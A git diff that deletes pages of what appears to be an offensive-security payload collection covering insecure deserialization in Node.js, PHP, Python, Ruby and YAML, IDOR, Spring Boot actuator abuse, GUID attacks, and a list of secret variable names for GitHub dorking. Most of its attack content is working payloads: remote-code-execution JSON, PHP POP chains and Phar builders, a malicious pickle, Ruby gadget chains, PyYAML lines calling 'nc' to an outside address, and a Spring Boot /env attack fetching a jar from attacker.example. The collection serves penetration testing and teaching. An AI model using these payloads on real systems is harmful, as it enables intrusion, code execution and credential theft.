{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"} - ``` -3. Send the payload - -### funcster - -```js -{"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}} -``` - - -## References - -* [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf) -* [NodeJS Deserialization - 8 January 2020- gonczor](https://blacksheephacks.pl/nodejs-deserialization/) -* [CVE-2017-5941 - NATIONAL VULNERABILITY DATABASE - 02/09/2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941) \ No newline at end of file diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md deleted file mode 100644 index 6e6aabe..0000000 --- a/Insecure Deserialization/PHP.md +++ /dev/null @@ -1,240 +0,0 @@ -# PHP Deserialization - -PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope. - -The following magic methods will help you for a PHP Object injection - -* __wakeup() when an object is unserialized. -* __destruct() when an object is deleted. -* __toString() when an object is converted to a string. - -Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phar) which use a PHP object injection. - -## Summary - -* [General concept](#general-concept) -* [Authentication bypass](#authentication-bypass) -* [Object Injection](#object-injection) -* [Finding and using gadgets](#finding-and-using-gadgets) -* [Phar Deserialization](#phar-deserialization) -* [Real world examples](#real-world-examples) -* [References](#references) - -## General concept - -Vulnerable code: - -```php -inject)){ - eval($this->inject); - } - } - } - if(isset($_REQUEST['r'])){ - $var1=unserialize($_REQUEST['r']); - if(is_array($var1)){ - echo "
".$var1[0]." - ".$var1[1]; - } - } - else{ - echo ""; # nothing happens here - } -?> -``` - -Craft a payload using existing code inside the application. - -```php -# Basic serialized data -a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";} - -# Command execution -string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}" -``` - -## Authentication bypass - -### Type juggling - -Vulnerable code: - -```php -secretCode = rand(500000,999999); - if($obj->guess === $obj->secretCode) { - echo "Win"; - } -} -?> -``` - -Payload: - -```php -O:13:"ObjectExample":2:{s:10:"secretCode";N;s:5:"guess";R:2;} -``` - -We can do an array like this: - -```php -a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;} -``` - -## Finding and using gadgets - -Also called `"PHP POP Chains"`, they can be used to gain RCE on the system. - -* In PHP source code, look for `unserialize()` function. -* Interesting [Magic Methods](https://www.php.net/manual/en/language.oop5.magic.php) such as `__construct()`, `__destruct()`, `__call()`, `__callStatic()`, `__get()`, `__set()`, `__isset()`, `__unset()`, `__sleep()`, `__wakeup()`, `__serialize()`, `__unserialize()`, `__toString()`, `__invoke()`, `__set_state()`, `__clone()`, and `__debugInfo()`: - * `__construct()`: PHP class constructor, is automatically called upon object creation - * `__destruct()`: PHP class destructor, is automatically called when references to the object are removed from memory - * `__toString()`: PHP call-back that gets executed if the object is treated like a string - * `__wakeup()` PHP call-back that gets executed upon deserialization - -[ambionics/phpggc](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks: - -- Laravel -- Symfony -- SwiftMailer -- Monolog -- SlimPHP -- Doctrine -- Guzzle - -```powershell -phpggc monolog/rce1 'phpinfo();' -s -phpggc monolog/rce1 assert 'phpinfo()' -phpggc swiftmailer/fw1 /var/www/html/shell.php /tmp/data -phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini -``` - -## Phar Deserialization - -Using `phar://` wrapper, one can trigger a deserialization on the specified file like in `file_get_contents("phar://./archives/app.phar")`. - -A valid PHAR includes four elements: - -1. **Stub**: The stub is a chunk of PHP code which is executed when the file is accessed in an executable context. At a minimum, the stub must contain `__HALT_COMPILER();` at its conclusion. Otherwise, there are no restrictions on the contents of a Phar stub. -2. **Manifest**: Contains metadata about the archive and its contents. -3. **File Contents**: Contains the actual files in the archive. -4. **Signature**(optional): For verifying archive integrity. - - -* Example of a Phar creation in order to exploit a custom `PDFGenerator`. - ```php - callback = "passthru"; - $dummy->fileName = "uname -a > pwned"; //our payload - - // Delete any existing PHAR archive with that name - @unlink("poc.phar"); - - // Create a new archive - $poc = new Phar("poc.phar"); - - // Add all write operations to a buffer, without modifying the archive on disk - $poc->startBuffering(); - - // Set the stub - $poc->setStub("setMetadata($dummy); - // Stop buffering and write changes to disk - $poc->stopBuffering(); - ?> - ``` - -* Example of a Phar creation with a `JPEG` magic byte header since there is no restriction on the content of stub. - ```php - data = $data; - } - - function __destruct() { - system($this->data); - } - } - - // create new Phar - $phar = new Phar('test.phar'); - $phar->startBuffering(); - $phar->addFromString('test.txt', 'text'); - $phar->setStub("\xff\xd8\xff\n"); - - // add object of any class as meta data - $object = new AnyClass('whoami'); - $phar->setMetadata($object); - $phar->stopBuffering(); - ``` - -## Real world examples - -* [Vanilla Forums ImportController index file_exists Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410237) -* [Vanilla Forums Xenforo password splitHash Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410212) -* [Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical) - Steven Seeley](https://hackerone.com/reports/410882) -* [Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/407552) - -## References - -* [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) -* [Utilizing Code Reuse/ROP in PHP](https://owasp.org/www-pdf-archive/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf) -* [PHP unserialize](http://php.net/manual/en/function.unserialize.php) -* [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) -* [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf) -* [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html) -* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://blog.raw.pm/en/meepwn-2017-write-ups/#TSULOTT-Web) -* [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d) -* [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://blog.raw.pm/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web) -* [Rusty Joomla RCE Unserialize overflow - Alessandro Groppo - October 3, 2019](https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/) -* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/) -* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/) -* [phar:// deserialization - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization) -* [Finding PHP Serialization Gadget Chain - DG'hAck Unserial killer - Aug 11, 2022 - xanhacks](https://www.xanhacks.xyz/p/php-gadget-chain/#introduction) \ No newline at end of file diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md deleted file mode 100644 index 656def5..0000000 --- a/Insecure Deserialization/Python.md +++ /dev/null @@ -1,57 +0,0 @@ -# Python Deserialization - -* In Python source code, look for: - * `cPickle.loads` - * `pickle.loads` - * `_pickle.loads` - * `jsonpickle.decode` - -## Pickle - -The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object. -:warning: `import cPickle` will only work on Python 2 - -```python -import cPickle -from base64 import b64encode, b64decode - -class User: - def __init__(self): - self.username = "anonymous" - self.password = "anonymous" - self.rank = "guest" - -h = User() -auth_token = b64encode(cPickle.dumps(h)) -print("Your Auth Token : {}").format(auth_token) -``` - -The vulnerability is introduced when a token is loaded from an user input. - -```python -new_token = raw_input("New Auth Token : ") -token = cPickle.loads(b64decode(new_token)) -print "Welcome {}".format(token.username) -``` - -Python 2.7 documentation clearly states Pickle should never be used with untrusted sources. Let's create a malicious data that will execute arbitrary code on the server. - -> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. - -```python -import cPickle, os -from base64 import b64encode, b64decode - -class Evil(object): - def __reduce__(self): - return (os.system,("whoami",)) - -e = Evil() -evil_token = b64encode(cPickle.dumps(e)) -print("Your Evil Token : {}").format(evil_token) -``` - -## References - -* [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/) -* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md deleted file mode 100644 index 1e5cc2a..0000000 --- a/Insecure Deserialization/README.md +++ /dev/null @@ -1,56 +0,0 @@ -# Insecure Deserialization - -> Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications. Deserialization is the reverse of that process -- taking data structured from some format, and rebuilding it into an object - OWASP - -Check the following sub-sections, located in other files : - -* [Java deserialization : ysoserial, ...](Java.md) -* [PHP (Object injection) : phpggc, ...](PHP.md) -* [Ruby : universal rce gadget, ...](Ruby.md) -* [Python : pickle, ...](Python.md) -* [YAML : PyYAML, ...](YAML.md) -* [.NET : ysoserial.net, ...](DotNET.md) - -| Object Type | Header (Hex) | Header (Base64) | -|-----------------|--------------|-----------------| -| Java Serialized | AC ED | rO | -| .NET ViewState | FF 01 | /w | -| Python Pickle | 80 04 95 | gASV | -| PHP Serialized | 4F 3A | Tz | - -## POP Gadgets - -> A POP (Property Oriented Programming) gadget is a piece of code implemented by an application's class, that can be called during the deserialization process. - -POP gadgets characteristics: -* Can be serialized -* Has public/accessible properties -* Implements specific vulnerable methods -* Has access to other "callable" classes - -## Labs - -* [Portswigger - Insecure Deserialization](https://portswigger.net/web-security/all-labs#insecure-deserialization) -* [NickstaDB/DeserLab - Java deserialization exploitation lab](https://github.com/NickstaDB/DeserLab) - -## References - -* [Github - frohoff/ysoserial](https://github.com/frohoff/ysoserial) -* [Github - pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net) -* [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) -* [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) -* [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) -* [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) -* [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) -* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) -* [PHP unserialize](http://php.net/manual/en/function.unserialize.php) -* [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) -* [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) -* [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin -* [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg -* [Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) -* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals -* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) -* [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh -* [ExploitDB Introduction](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) -* [Exploiting insecure deserialization vulnerabilities - PortSwigger](https://portswigger.net/web-security/deserialization/exploiting) \ No newline at end of file diff --git a/Insecure Deserialization/Ruby.md b/Insecure Deserialization/Ruby.md deleted file mode 100644 index c3f2fa6..0000000 --- a/Insecure Deserialization/Ruby.md +++ /dev/null @@ -1,63 +0,0 @@ -# Ruby Deserialization - -## Marshal.load - -Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5 - -```ruby -for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done -``` - -## Yaml.load - -Vulnerable code -```ruby -require "yaml" -YAML.load(File.read("p.yml")) -``` - -Universal gadget for ruby <= 2.7.2: -```ruby ---- !ruby/object:Gem::Requirement -requirements: - !ruby/object:Gem::DependencyList - specs: - - !ruby/object:Gem::Source::SpecificFile - spec: &1 !ruby/object:Gem::StubSpecification - loaded_from: "|id 1>&2" - - !ruby/object:Gem::Source::SpecificFile - spec: -``` - -Universal gadget for ruby 2.x - 3.x. - -```ruby ---- -- !ruby/object:Gem::Installer - i: x -- !ruby/object:Gem::SpecFetcher - i: y -- !ruby/object:Gem::Requirement - requirements: - !ruby/object:Gem::Package::TarReader - io: &1 !ruby/object:Net::BufferedIO - io: &1 !ruby/object:Gem::Package::TarReader::Entry - read: 0 - header: "abc" - debug_output: &1 !ruby/object:Net::WriteAdapter - socket: &1 !ruby/object:Gem::RequestSet - sets: !ruby/object:Net::WriteAdapter - socket: !ruby/module 'Kernel' - method_id: :system - git_set: id - method_id: :resolve -``` - - -## References - -- [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) -- [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/) -- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) -- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/) -* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/) \ No newline at end of file diff --git a/Insecure Deserialization/YAML.md b/Insecure Deserialization/YAML.md deleted file mode 100644 index d931178..0000000 --- a/Insecure Deserialization/YAML.md +++ /dev/null @@ -1,99 +0,0 @@ -# YAML Deserialization - -## Summary - -* [Tools](#tools) -* [Exploit](#exploit) - * [PyYAML](#pyyaml) - * [ruamel.yaml](#ruamelyaml) - * [Ruby](#ruby) - * [SnakeYAML](#snakeyaml) -* [References](#references) - -## Tools - -* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) -* [artsploit/yaml-payload](https://github.com/artsploit/yaml-payload) - A tiny project for generating SnakeYAML deserialization payloads -* [mbechler/marshalsec](https://github.com/mbechler/marshalsec) - -## Exploit - -### PyYAML - -```yaml -!!python/object/apply:time.sleep [10] -!!python/object/apply:builtins.range [1, 10, 1] -!!python/object/apply:os.system ["nc 10.10.10.10 4242"] -!!python/object/apply:os.popen ["nc 10.10.10.10 4242"] -!!python/object/new:subprocess [["ls","-ail"]] -!!python/object/new:subprocess.check_output [["ls","-ail"]] -``` - -```yaml -!!python/object/apply:subprocess.Popen -- ls -``` - -```yaml -!!python/object/new:str -state: !!python/tuple -- 'print(getattr(open("flag\x2etxt"), "read")())' -- !!python/object/new:Warning - state: - update: !!python/name:exec -``` - -Since PyYaml version 6.0, the default loader for ```load``` has been switched to SafeLoader mitigating the risks against Remote Code Execution. -[PR fixing the vulnerabily](https://github.com/yaml/pyyaml/issues/420) - -The vulnerable sinks are now ```yaml.unsafe_load``` and ```yaml.load(input, Loader=yaml.UnsafeLoader)``` - -``` -with open('exploit_unsafeloader.yml') as file: - data = yaml.load(file,Loader=yaml.UnsafeLoader) -``` - -## Ruamel.yaml - -## Ruby - -```ruby - --- - - !ruby/object:Gem::Installer - i: x - - !ruby/object:Gem::SpecFetcher - i: y - - !ruby/object:Gem::Requirement - requirements: - !ruby/object:Gem::Package::TarReader - io: &1 !ruby/object:Net::BufferedIO - io: &1 !ruby/object:Gem::Package::TarReader::Entry - read: 0 - header: "abc" - debug_output: &1 !ruby/object:Net::WriteAdapter - socket: &1 !ruby/object:Gem::RequestSet - sets: !ruby/object:Net::WriteAdapter - socket: !ruby/module 'Kernel' - method_id: :system - git_set: sleep 600 - method_id: :resolve -``` - -## SnakeYAML - -```yaml -!!javax.script.ScriptEngineManager [ - !!java.net.URLClassLoader [[ - !!java.net.URL ["http://attacker-ip/"] - ]] -] -``` - - -## References - -* [Python Yaml Deserialization - hacktricks.xyz][https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization] -* [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13][https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf] -* [PyYAML Documentation](https://pyyaml.org/wiki/PyYAMLDocumentation) -* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/) -* [[CVE-2019-20477]- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - @_j0lt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/) diff --git a/Insecure Direct Object References/Images/idor.png b/Insecure Direct Object References/Images/idor.png deleted file mode 100644 index b41c634..0000000 Binary files a/Insecure Direct Object References/Images/idor.png and /dev/null differ diff --git a/Insecure Direct Object References/README.md b/Insecure Direct Object References/README.md deleted file mode 100644 index c3fda4c..0000000 --- a/Insecure Direct Object References/README.md +++ /dev/null @@ -1,73 +0,0 @@ -# Insecure Direct Object References - -> Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files. - OWASP - -## Summary - -* [Tools](#tools) -* [Exploit](#exploit) - * [IDOR Tips](#idor-tips) -* [Examples](#examples) -* [References](#references) - -## Tools - -- [BApp Store > Authz](https://portswigger.net/bappstore/4316cc18ac5f434884b2089831c7d19e) -- [BApp Store > AuthMatrix](https://portswigger.net/bappstore/30d8ee9f40c041b0bfec67441aad158e) -- [BApp Store > Autorize](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f) - -## Exploit - -![https://lh5.googleusercontent.com/VmLyyGH7dGxUOl60h97Lr57F7dcnDD8DmUMCZTD28BKivVI51BLPIqL0RmcxMPsmgXgvAqY8WcQ-Jyv5FhRiCBueX9Wj0HSCBhE-_SvrDdA6_wvDmtMSizlRsHNvTJHuy36LG47lstLpTqLK](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Insecure%20Direct%20Object%20References/Images/idor.png) - -The value of a parameter is used directly to retrieve a database record. - -```powershell -http://foo.bar/somepage?invoice=12345 -``` - -The value of a parameter is used directly to perform an operation in the system - -```powershell -http://foo.bar/changepassword?user=someuser -``` - -The value of a parameter is used directly to retrieve a file system resource - -```powershell -http://foo.bar/showImage?img=img00011 -``` - -The value of a parameter is used directly to access application functionality - -```powershell -http://foo.bar/accessPage?menuitem=12 -``` - -### IDOR Tips - -* Change the HTTP request: POST → PUT -* Change the content type: XML → JSON -* Increment/decrement numerical values (1,2,3,..) -* GUID/UUID might be weak -* Transform numerical values to arrays: `{"id":19} → {"id":[19]}` - - -## Examples - -* [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789) -* [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661) - -## Labs - -* [Insecure direct object references](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references) - -## References - -* [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)) -* [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet) -* [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/) -* [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec -* [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty) -* [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) -* [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782) \ No newline at end of file diff --git a/Insecure Management Interface/Intruder/springboot_actuator.txt b/Insecure Management Interface/Intruder/springboot_actuator.txt deleted file mode 100644 index 1b12a1d..0000000 --- a/Insecure Management Interface/Intruder/springboot_actuator.txt +++ /dev/null @@ -1,52 +0,0 @@ -auditevents -autoconfig -beans -caches -conditions -configprops -dump -env -flyway -health -heapdump -httptrace -info -integrationgraph -jolokia -logfile -loggers -liquibase -metrics -mappings -prometheus -scheduledtasks -sessions -shutdown -threaddump -trace -actuator/auditevents -actuator/autoconfig -actuator/beans -actuator/caches -actuator/conditions -actuator/configprops -actuator/dump -actuator/env -actuator/flyway -actuator/health -actuator/heapdump -actuator/httptrace -actuator/info -actuator/integrationgraph -actuator/jolokia -actuator/logfile -actuator/loggers -actuator/liquibase -actuator/metrics -actuator/mappings -actuator/prometheus -actuator/scheduledtasks -actuator/sessions -actuator/shutdown -actuator/threaddump -actuator/trace \ No newline at end of file diff --git a/Insecure Management Interface/README.md b/Insecure Management Interface/README.md deleted file mode 100644 index 2c7bb95..0000000 --- a/Insecure Management Interface/README.md +++ /dev/null @@ -1,94 +0,0 @@ -# Insecure Management Interface - -## Springboot-Actuator - -Actuator endpoints let you monitor and interact with your application. -Spring Boot includes a number of built-in endpoints and lets you add your own. -For example, the `/health` endpoint provides basic application health information. - -Some of them contains sensitive info such as : - -- `/trace` - Displays trace information (by default the last 100 HTTP requests with headers). -- `/env` - Displays the current environment properties (from Spring’s ConfigurableEnvironment). -- `/heapdump` - Builds and returns a heap dump from the JVM used by our application. -- `/dump` - Displays a dump of threads (including a stack trace). -- `/logfile` - Outputs the contents of the log file. -- `/mappings` - Shows all of the MVC controller mappings. - -These endpoints are enabled by default in Springboot 1.X. -Note: Sensitive endpoints will require a username/password when they are accessed over HTTP. - -Since Springboot 2.X only `/health` and `/info` are enabled by default. - -### Remote Code Execution via `/env` - -Spring is able to load external configurations in the YAML format. -The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks. -In other words, an attacker can gain remote code execution by loading a malicious config file. - -#### Steps - -1. Generate a payload of SnakeYAML deserialization gadget. - -- Build malicious jar -```bash -git clone https://github.com/artsploit/yaml-payload.git -cd yaml-payload -# Edit the payload before executing the last commands (see below) -javac src/artsploit/AwesomeScriptEngineFactory.java -jar -cvf yaml-payload.jar -C src/ . -``` - -- Edit src/artsploit/AwesomeScriptEngineFactory.java - -```java -public AwesomeScriptEngineFactory() { - try { - Runtime.getRuntime().exec("ping rce.poc.attacker.example"); // COMMAND HERE - } catch (IOException e) { - e.printStackTrace(); - } -} -``` - -- Create a malicious yaml config (yaml-payload.yml) - -```yaml -!!javax.script.ScriptEngineManager [ - !!java.net.URLClassLoader [[ - !!java.net.URL ["http://attacker.example/yaml-payload.jar"] - ]] -] -``` - - -2. Host the malicious files on your server. - -- yaml-payload.jar -- yaml-payload.yml - - -3. Change `spring.cloud.bootstrap.location` to your server. - -``` -POST /env HTTP/1.1 -Host: victim.example:8090 -Content-Type: application/x-www-form-urlencoded -Content-Length: 59 - -spring.cloud.bootstrap.location=http://attacker.example/yaml-payload.yml -``` - -4. Reload the configuration. - -``` -POST /refresh HTTP/1.1 -Host: victim.example:8090 -Content-Type: application/x-www-form-urlencoded -Content-Length: 0 -``` - -## References - -* [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) -* [Exploiting Spring Boot Actuators - Veracode](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators) diff --git a/Insecure Randomness/README.md b/Insecure Randomness/README.md deleted file mode 100644 index 9f23fe7..0000000 --- a/Insecure Randomness/README.md +++ /dev/null @@ -1,43 +0,0 @@ -# Insecure Randomness - -## Summary - -* [GUID / UUID](#guid--uuid) - * [GUID Versions](#guid-versions) - * [Tools](#tools) -* [References](#references) - -## GUID / UUID - -### GUID Versions - -Version identification: `xxxxxxxx-xxxx-Mxxx-Nxxx-xxxxxxxxxxxx` -The four-bit M and the 1- to 3-bit N fields code the format of the UUID itself. - -| Version | Notes | -|----------|--------| -| 0 | Only `00000000-0000-0000-0000-000000000000` | -| 1 | based on time, or clock sequence | -| 2 | reserved in the RFC 4122, but ommitted in many implementations | -| 3 | based on a MD5 hash | -| 4 | randomly generated | -| 5 | based on a SHA1 hash | - -### Tools - -* [intruder-io/guidtool](https://github.com/intruder-io/guidtool) - A tool to inspect and attack version 1 GUIDs - ```ps1 - $ guidtool -i 95f6e264-bb00-11ec-8833-00155d01ef00 - UUID version: 1 - UUID time: 2022-04-13 08:06:13.202186 - UUID timestamp: 138691299732021860 - UUID node: 91754721024 - UUID MAC address: 00:15:5d:01:ef:00 - UUID clock sequence: 2099 - - $ guidtool 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c -t '2021-11-17 18:03:17' -p 10000 - ``` - -### References - -* [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust) \ No newline at end of file diff --git a/Insecure Source Code Management/Files/github-dorks.txt b/Insecure Source Code Management/Files/github-dorks.txt deleted file mode 100644 index 60a7730..0000000 --- a/Insecure Source Code Management/Files/github-dorks.txt +++ /dev/null @@ -1,1401 +0,0 @@ -GITHUB_TOKEN= -PATH= -CODECLIMATE_REPO_TOKEN= -DOCKER_PASSWORD= -NPM_TOKEN= -GH_TOKEN= -encrypted_02ddd67d5586_iv= -encrypted_517c5824cb79_key= -encrypted_02ddd67d5586_key= -encrypted_517c5824cb79_iv= -encrypted_1366e420413c_key= -encrypted_1366e420413c_iv= -DOCKER_USERNAME= -ARTIFACTS_SECRET= -ARTIFACTS_KEY= -SURGE_TOKEN= -SURGE_LOGIN= -ARTIFACTS_BUCKET= -SAUCE_ACCESS_KEY= -SAUCE_USERNAME= -DB_USER= -DB_PORT= -DB_HOST= -DBP= -javascriptEnabled= -acceptSslCerts= -AWS_ACCESS_KEY_ID= -AWS_SECRET_ACCESS_KEY= -DOCKER_EMAIL= -GH_USER_EMAIL= -GH_USER_NAME= -CLOUDINARY_URL= -COVERALLS_REPO_TOKEN= -CF_PASSWORD= -CF_SPACE= -CF_USERNAME= -CF_ORGANIZATION= -WPT_REPORT_API_KEY= -USABILLA_ID= -encrypted_17b59ce72ad7_key= -encrypted_17b59ce72ad7_iv= -NGROK_TOKEN= -rotatable= -CLOUDINARY_URL_STAGING= -encrypted_2c8d10c8cc1d_key= -encrypted_2c8d10c8cc1d_iv= -SRCCLR_API_TOKEN= -NPM_AUTH_TOKEN= -takesScreenshot= -GH_UNSTABLE_OAUTH_CLIENT_SECRET= -GH_OAUTH_CLIENT_SECRET= -GH_NEXT_UNSTABLE_OAUTH_CLIENT_SECRET= -GH_UNSTABLE_OAUTH_CLIENT_ID= -GH_OAUTH_CLIENT_ID= -GH_NEXT_OAUTH_CLIENT_ID= -GH_NEXT_UNSTABLE_OAUTH_CLIENT_ID= -GH_NEXT_OAUTH_CLIENT_SECRET= -marionette= -NPM_CONFIG_AUDIT= -FTP_PW= -FTP_LOGIN= -NPM_CONFIG_STRICT_SSL= ---ignore-ssl-errors= -TRAVIS_SECURE_ENV_VARS= -FOSSA_API_KEY= -VIP_GITHUB_DEPLOY_KEY= -SIGNING_KEY_SID= -SIGNING_KEY_SECRET= -ACCOUNT_SID= -API_KEY_SID= -API_KEY_SECRET= -CI_DEPLOY_PASSWORD= -CONFIGURATION_PROFILE_SID_SFU= -CONFIGURATION_PROFILE_SID_P2P= -ANACONDA_TOKEN= -CC_TEST_REPORTER_ID= -OS_TENANT_NAME= 